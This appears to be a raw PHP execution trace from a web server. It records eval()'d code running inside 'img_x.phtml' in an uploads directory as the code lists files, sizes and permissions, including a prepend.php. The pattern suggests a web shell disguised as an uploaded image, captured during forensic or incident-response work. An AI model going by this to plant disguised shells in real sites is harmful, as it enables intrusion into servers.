/var/www/html/uploads/img_x.phtml(70) : eval()'d code 1527 $info .= '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1530 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1531 $info .= '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1534 $info .= '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1537 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1538 $info .= '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1541 $info .= '-' 3 36 1 0.008428 892208 3 36 R '-rw-r--r--' 3 38 0 0.008454 892168 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/.htaccess' 3 38 1 0.008472 892208 3 38 R FALSE 3 39 0 0.008485 892168 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/.htaccess' 3 39 1 0.008501 892208 3 39 R TRUE 3 40 0 0.008515 892168 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/data' 3 40 1 0.008532 892208 3 40 R FALSE 3 41 0 0.008545 892176 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/img_x.phtml' 3 41 1 0.008561 892224 3 41 R TRUE 3 42 0 0.008574 892184 filesize 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 1 '/var/www/html/uploads/img_x.phtml' 3 42 1 0.008587 892224 3 42 R 25240 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 $size = 24.6484375 3 43 0 0.008613 892080 round 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 2 24.6484375 3 3 43 1 0.008627 892152 3 43 R 24.648 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 $size = 24.648 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1471 $size = '24.648 KB' 3 44 0 0.008668 892184 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1478 1 '/var/www/html/uploads/img_x.phtml' 3 44 1 0.008685 892224 3 44 R FALSE 3 45 0 0.008698 892184 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1479 1 '/var/www/html/uploads/img_x.phtml' 3 45 1 0.008714 892224 3 45 R TRUE 3 46 0 0.008727 892184 perms 1 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1480 1 '/var/www/html/uploads/img_x.phtml' 4 47 0 0.008740 892184 fileperms 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 1 '/var/www/html/uploads/img_x.phtml' 4 47 1 0.008754 892224 4 47 R 33204 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 $perms = 33204 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1504 $info = '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1523 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1524 $info .= 'w' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1527 $info .= '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1530 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1531 $info .= 'w' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1534 $info .= '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1537 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1538 $info .= '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1541 $info .= '-' 3 46 1 0.008885 892224 3 46 R '-rw-rw-r--' 3 48 0 0.008899 892184 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/img_x.phtml' 3 48 1 0.008921 892224 3 48 R FALSE 3 49 0 0.008935 892184 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/img_x.phtml' 3 49 1 0.008951 892224 3 49 R TRUE 3 50 0 0.008965 892184 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/prepend.php' 3 50 1 0.008981 892224 3 50 R TRUE 3 51 0 0.008994 892184 filesize 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 1 '/var/www/html/uploads/prepend.php' 3 51 1 0.009009 892224 3 51 R 57 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 $size = 0.0556640625 3 52 0 0.009052 892080 round 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 2 0.0556640625 3 3 52 1 0.009067 892152 3 52 R 0.056 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 $size = 0.056 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1471 $size = '0.056 KB' 3 53 0 0.009108 892184 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1478 1 '/var/www/html/uploads/prepend.php' 3 53 1 0.009125 892224 3 53 R FALSE 3 54 0 0.009138 892184 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1479 1 '/var/www/html/uploads/prepend.php' 3 54 1 0.009154 892224 3 54 R TRUE 3 55 0 0.009167 892184 perms 1 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1480 1 '/var/www/html/uploads/prepend.php' 4 56 0 0.009181 892184 fileperms 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 1 '/var/www/html/uploads/prepend.php' 4 56 1 0.009196 892224 4 56 R 33261 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 $perms = 33261 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1504 $info = '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1523 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1524 $info .= 'w' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1527 $info .= 'x' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1530 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1531 $info .= '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1534 $info .= 'x' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1537 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1538 $info .= '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1541 $info .= 'x' 3 55 1 0.009408 892224 3 55 R '-rwxr-xr-x' 3 57 0 0.009440 892184 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/prepend.php' 3 57 1 0.009477 892224 3 57 R FALSE 3 58 0 0.009504 892184 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/prepend.php' 3 58 1 0.009534 892224 3 58 R TRUE 2 8 1 0.009579 892120 1 3 1 0.009645 614568 0.009705 525344 TRACE END [2023-02-12 19:35:39.884427]